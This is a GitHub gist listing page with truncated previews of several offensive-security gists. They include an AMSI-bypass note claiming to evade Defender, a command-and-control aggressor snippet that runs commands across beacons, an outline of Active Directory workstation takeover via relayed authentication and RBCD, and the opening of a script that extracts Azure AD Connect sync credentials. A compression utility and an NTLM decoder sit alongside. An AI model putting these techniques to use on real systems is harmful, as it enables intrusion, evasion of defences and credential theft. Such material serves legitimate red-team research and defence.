
bobby-tablez / unicode_amsi_bypass.txt
Last active March 29, 2024 17:25
AMSI Bypass Unicode Combining
# This simply echoes a huge amount of overlapped or combined Unicode characters before and after an unobfuscated AMSI Bypass.
# This somehow allows the user to run whatever they want inside the overlapping character blobs.
# Currently bypasses Defender Dec. 2023
# Writeup:
# Overlapping Unicode Chars:
# AMSI Bypass:
on heartbeat_15m {
foreach $beacon (beacons()) {
println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
$id = $beacon['id'];
print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
exec("python3.7 /<fullpath>/ --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
Wra7h / Compress.cs
Created December 2, 2021 08:00
C# Compression using Windows API
//Compresses a file using the Windows API
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\Compress.cs
//Windows Compression API:
//Supported Algorithms:
// Takes a file, compresses it using one of the supported algorithms and creates a file with the compressed data.
using System;
using System.IO;
using System.Linq;
gladiatx0r /
Last active January 2, 2025 00:23
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

xpn / azuread_decrypt_msol_v2.ps1
Last active March 14, 2025 13:35
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
try {
    # Open the connection to the ADSync localdb instance (the call that the catch below reports on)
    $client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
aseering /
Last active March 12, 2025 11:27
NTLM auth-string decoder
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <>
## with additional detail subsequently added from the official protocol spec:
## <>